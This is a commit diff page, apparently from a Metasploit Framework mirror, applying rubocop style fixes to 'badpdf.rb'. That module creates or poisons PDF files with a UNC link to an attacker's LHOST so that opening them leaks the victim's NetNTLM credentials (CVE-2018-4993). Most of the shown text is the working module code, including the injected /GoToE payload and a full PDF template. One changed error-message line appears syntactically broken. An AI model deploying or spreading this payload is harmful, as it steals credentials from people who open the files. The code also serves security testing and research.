infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Code Improvements 

Ran module through rubocop
GSoC/Meterpreter_Web_Console
rmdavy 2018-06-12 22:55:38 +01:00 committed by GitHub
parent 6b58163fde
commit 477d709ff6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 35 additions and 36 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

37
modules/auxiliary/fileformat/badpdf.rb
View File

@ -9,11 +9,11 @@ class MetasploitModule < Msf::Auxiliary
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'BADPDF Malicious PDF Creator', 'Name' => 'BADPDF Malicious PDF Creator',
'Description' => %q{ 'Description' => '
This module can either creates a blank PDF file which contains a UNC link which can be used This module can either creates a blank PDF file which contains a UNC link which can be used
to capture NetNTLM credentials, or if the PDFINJECT option is used it will inject the necessary to capture NetNTLM credentials, or if the PDFINJECT option is used it will inject the necessary
code into an existing PDF document if possible. code into an existing PDF document if possible.
}, ',
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
@ -27,26 +27,26 @@ class MetasploitModule < Msf::Auxiliary
[ [
['CVE', '2018-4993'], ['CVE', '2018-4993'],
['URL', 'https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/'] ['URL', 'https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/']
] ])
)
))
register_options( register_options(
[ [
OptAddress.new("LHOST", [ true, "Host listening for incoming SMB/WebDAV traffic", nil]), OptAddress.new('LHOST', [true, 'Host listening for incoming SMB/WebDAV traffic', nil]),
OptString.new("FILENAME", [ false, "Filename"]), OptString.new('FILENAME', [false, 'Filename']),
OptPath.new("PDFINJECT", [ false, "Path and filename to existing PDF to inject UNC link code into"]), OptPath.new('PDFINJECT', [false, 'Path and filename to existing PDF to inject UNC link code into'])
]) ]
)
end end
def run def run
if datastore['PDFINJECT'].to_s.end_with?('.pdf') && datastore['FILENAME'].to_s.end_with?('.pdf') if datastore['PDFINJECT'].to_s.end_with?('.pdf') && datastore['FILENAME'].to_s.end_with?('.pdf')
print_error "Please configure either FILENAME or PDFINJECT" print_error 'Please configure either FILENAME or PDFINJECT'
elsif !datastore['PDFINJECT'].nil? && datastore['PDFINJECT'].to_s.end_with?('.pdf') elsif !datastore['PDFINJECT'].nil? && datastore['PDFINJECT'].to_s.end_with?('.pdf')
injectpdf injectpdf
elsif !datastore['FILENAME'].nil? && datastore['FILENAME'].to_s.end_with?('.pdf') elsif !datastore['FILENAME'].nil? && datastore['FILENAME'].to_s.end_with?('.pdf')
createpdf createpdf
else else
print_error "FILENAME or PDFINJECT must end with '.pdf' file extension" print_error 'FILENAME or PDFINJECT must end with '.pdf' file extension'
end end
end end
@ -55,7 +55,7 @@ class MetasploitModule < Msf::Auxiliary
inject_payload = "/AA <</O <</F (\\\\\\\\#{datastore['LHOST']}\\\\test)/D [ 0 /Fit]/S /GoToE>>>>" inject_payload = "/AA <</O <</F (\\\\\\\\#{datastore['LHOST']}\\\\test)/D [ 0 /Fit]/S /GoToE>>>>"
# if given path doesn't exist display error and return # if given path doesn't exist display error and return
unless File.exists?(datastore['PDFINJECT']) unless File.exist?(datastore['PDFINJECT'])
# If file not found display error message # If file not found display error message
print_error "File doesn't exist #{datastore['PDFINJECT']}" print_error "File doesn't exist #{datastore['PDFINJECT']}"
return return
@ -65,7 +65,7 @@ class MetasploitModule < Msf::Auxiliary
content = File.read(datastore['PDFINJECT']) content = File.read(datastore['PDFINJECT'])
# Check for place holder - below ..should.. cover most scenarios. # Check for place holder - below ..should.. cover most scenarios.
newdata = "" newdata = ''
[2, 4, 6, 8].each do |pholder| [2, 4, 6, 8].each do |pholder|
unless content.index("/Contents #{pholder} 0 R").nil? unless content.index("/Contents #{pholder} 0 R").nil?
# If place holder exists create new file content # If place holder exists create new file content
@ -75,8 +75,8 @@ class MetasploitModule < Msf::Auxiliary
end end
# Display error message if we couldn't poison the file # Display error message if we couldn't poison the file
if newdata.nil? if newdata.empty?
print_error "Could not find placeholder to poison file this time...." print_error 'Could not find placeholder to poison file this time....'
return return
end end
@ -85,16 +85,16 @@ class MetasploitModule < Msf::Auxiliary
# Write content to file # Write content to file
File.open(newfilename, 'wb') { |file| file.write(newdata) } File.open(newfilename, 'wb') { |file| file.write(newdata) }
# Check file exists and display path or error message # Check file exists and display path or error message
if File.exists?(newfilename) if File.exist?(newfilename)
print_good("Malicious file writen to: #{newfilename}") print_good("Malicious file writen to: #{newfilename}")
else else
print_error "Something went wrong creating malicious PDF file" print_error 'Something went wrong creating malicious PDF file'
end end
end end
def createpdf def createpdf
# Code below taken POC provided by CheckPoint Research # Code below taken POC provided by CheckPoint Research
pdf = "" pdf = ''
pdf << "%PDF-1.7\n" pdf << "%PDF-1.7\n"
pdf << "1 0 obj\n" pdf << "1 0 obj\n"
pdf << "<</Type/Catalog/Pages 2 0 R>>\n" pdf << "<</Type/Catalog/Pages 2 0 R>>\n"
@ -155,5 +155,4 @@ class MetasploitModule < Msf::Auxiliary
# Write data to filename # Write data to filename
file_create(pdf) file_create(pdf)
end end
end end